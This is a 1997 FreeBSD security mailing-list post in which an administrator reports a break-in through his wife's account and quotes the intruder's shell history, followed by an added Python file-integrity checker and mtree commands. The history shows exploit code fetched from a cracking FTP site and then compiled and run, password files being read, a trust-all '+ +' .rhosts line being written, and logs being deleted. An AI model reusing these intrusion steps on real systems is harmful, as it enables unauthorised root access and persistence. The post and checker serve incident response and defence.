Date:      Fri, 20 Jun 1997 10:33:14 -0600
From:      Sean Kelly <kelly@fsl.noaa.gov>
To:        freebsd-security@freebsd.org
Subject:   Attempt to compromise root
Message-ID:  <33AAB0CA.2781E494@fsl.noaa.gov>

I'm running FreeBSD 2.2-RELEASE.

One of my users (okay, she's my wife) had submitted a crontab which had
a bad MAILTO line in it, resulting in a MAILER-DAEMON message being sent
to me every time the job was run ... and the job was set to run every
minute:

	* * * * * id

When I asked her, she said she didn't know what a crontab file was.
That's when I suspected foul play.  The wtmp indicated that she had
logged in from a remote site early in the morning when I *know* :-) she
was asleep.

Then we found the following in her .history file:

--------------------------------------------------------------------
rm *
ftp the.art.of.sekurity.org
more /etc/passwd
ls
cc -o gr1 bsd1.c
rm bsd1.c
rm gr1
cc -o gr1 bsd2.c
chmod 700 gr1
./gr1
./gr1 mary root
rm gr1
ls -al
cc -o gr bsd3.c
chmod 700 gr
./gr
ls
rm bsd2.c
rm bsd3.c
ls
rm gr
cc -o gr bsd4.c
ls -al
./gr
rm bsd4.c gr
cc -o gr bsd5.c
ls -al
./gr
id
rm gr
rm bsd5
rm bsd5.c
cc -o gr bsd6.c
./gr
rm bsd6.c
rm gr
ls -al
cc -o gr bsd7.c
ls -al
rm bsd7.c
ftp the.art.of.sekurity.org
ls
cc -o jump jump.c
ls -al
./jump
id
./jump
rm *
uname -a
cd /bin
ls -al | more
ls -al | grep wheel
cd ..
ls -al
cd etc
ls -al | more
more security
ls -al mast*
cd /
cat .rhosts
cd
cat .rhosts
ls -al
ls -al | grep drwx
telnet localhost 25
cd /tmp.tmp
cd /tmp/.tmp
ftp the.art.of.sekurity.org
ls -al
cc -o gr bsd1.c
more bsd1.c
rm gr
mv bsd1.c egg.c
cc -s -o /tmp/.tmp/egg -O egg.c
EDITOR='/tmp/.tmp/egg -1259' export EDITOR
EDITOR='/tmp/.tmp/egg -1259' e ; xport EDITOR
EDITOR='/tmp/.tmp/egg -1259' ; export EDITOR
more bsd1.c
ls -al
more egg.c
crontab -e
ls
more egg.c
EDITOR='/tmp/.tmp/egg -1259' ; export EDITOR
bash
whereis bash
/usr/ports/shells/bash
ls -al /usr/ports/shells/bash
/bin/sh
ls -al
rm egg*
pico bsd2.c
more bsd2.c
mv bsd2.c bsd.sh
./bsd.sh
chmod 700 bsd.sh
./bsd.sh
cd /tmp
ls sh*
cd .tmp
ls -al
rm bsd.sh
cp bsd.one bsd.c
vi bsd.c
ls
rm bsd.one
rm bsd.c
ls
cc -o gr bsd3.c
ls
rm bsd3.c
ftp the.art.of.sekurity.org
ls
tar xfv bsd.tar
mv grind.c ohjoy.c sploit ..
cd ..
chmod 700 sploit
chmod 644 *.c
./sploit
id
kill ^1
kill %1
rm ohj*
rm grind*
rm sploit*
ls
rmdir .tmp
cd
ls -al
rm -rf /tmp/.tmp
whereis larn
cd /tmp
mkdir tmp
cd tmp
ftp the.art.of.sekurity.org
ls
cc -o fuck bsd1.c
./fuck
ls
rm fuck
cc -o fuck bsd2.c
./fuck
rm fuck
cc -o fuck bsd3.c
ls
ls /usr/bin/crontab
ls -al /usr/bin/crontab
cc -o fuck bsd4.c
./fuck
./fuck lp1
./fuck bamboo
ls
rm fuck
more bsd1.sh
./bsd1.sh
chmod 700 bsd1.sh
./bsd1.sh
more bsd2.sh
chmod 700 bsd2.
chmod 700 bsd2.*
./bsd2.sh
ls -al
rm *
cd ..
rmdir .tmp
cd
rm -rf /tmp/tmp
cd /etc
cat hosts
cd /home
ls -al
cd rosemary/
ls
ls -al
find . -name .rhosts -print
ypcat passwd
w
cd /etc
more passwd
cd /u
ls -al
pwd
cd ..
ls
ls -al
echo "+ +" >> .rhosts
echo "+ +" > .rhosts
ls -al | more
exit
cd /home
ls
cd rosemary/
ls
ls -al
cd
ls -al | more
rm .history
exit
--------------------------------------------------------------------

Luckily, the idiot didn't realize that the .history file is updated
after logout, and we got a record of most of his/her activities.

I've tried ftp'ing to the.art.of.sekurity.org and have been successful
only once, but haven't been able to transfer any files.  sekurity.org
appears registered to an organization called "Insekurity, Inc.".

I checked config files, .rhosts, system binaries, and everything seems
intact, so I don't think root was compromised.  However, I don't have an
md5/mtree digest of everything so I'm not 100% sure.  Next I'll go back
to source media and do some comparisons.

So, two issues:

(1) Does this type of attack seem familiar?  Is anyone aware of
"sekurity.org" and what their purpose is?  Is there someone there to
whom I should complain?  (Doubtful, as it appears the reason that ftp
site exists is to provide a repository of cracking code.)

(2) Can we get an option during the FreeBSD install to generate the
md5/mtree digest?  Naturally, I read up on this feature after the
attack, but after an attack it's too late.

-- 
Sean Kelly
NOAA Forecast Systems Laboratory
Boulder Colorado USA
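The md5/mtree-style digest the post wishes it had beforehand, as an added Python example that is neither part of this message nor FreeBSD's own mtree: it baselines the permission bits, ownership and SHA-256 of every regular file under a directory and then reports what an intruder leaves behind, such as a replaced binary, a newly planted setuid bit, or a fresh `+ +` .rhosts. The tree it inspects is a constructed temporary directory, not a real system.

```python
import hashlib
import os
import stat
import tempfile
from pathlib import Path

SUID_BITS = stat.S_ISUID | stat.S_ISGID

def snapshot(root):
    """Record (mode, uid, gid, sha256) for every regular file under root, keyed by relative path."""
    spec = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            st = p.lstat()
            if not stat.S_ISREG(st.st_mode):  # skip symlinks, devices and the like
                continue
            digest = hashlib.sha256(p.read_bytes()).hexdigest()
            spec[p.relative_to(root).as_posix()] = (stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid, digest)
    return spec

def compare(baseline, current):
    """Return sorted (path, reason) pairs: removed, added, altered, and newly setuid/setgid files."""
    findings = []
    for rel in sorted(set(baseline) | set(current)):
        if rel not in current:
            findings.append((rel, "missing"))
            continue
        mode, uid, gid, digest = current[rel]
        old = baseline.get(rel)
        if old is None:
            findings.append((rel, "added"))
        else:
            if old[3] != digest:
                findings.append((rel, "contents changed"))
            if old[0] != mode:
                findings.append((rel, "mode changed %o -> %o" % (old[0], mode)))
            if old[1:3] != (uid, gid):
                findings.append((rel, "owner changed"))
        if mode & SUID_BITS and not (old and old[0] & SUID_BITS):
            findings.append((rel, "setuid/setgid bit set"))
    return findings

def demo():  # constructed sample tree; the tampering mirrors what the history above hints at
    root = Path(tempfile.mkdtemp())
    (root / "bin").mkdir()
    (root / "bin" / "ls").write_bytes(b"original ls binary")
    baseline = snapshot(root)                 # the digest one wishes existed before the attack
    (root / "bin" / "ls").write_bytes(b"trojaned ls")
    (root / "bin" / "ls").chmod(0o4755)       # setuid bit planted on a system binary
    (root / ".rhosts").write_text("+ +\n")    # the trust-all .rhosts seen in the history
    return compare(baseline, snapshot(root))
```

On FreeBSD the equivalent baseline and check with the system tool are `mtree -c -K md5digest -p /bin > bin.spec` and later `mtree -p /bin < bin.spec`, with the spec kept on read-only media so a root-level intruder cannot rewrite it.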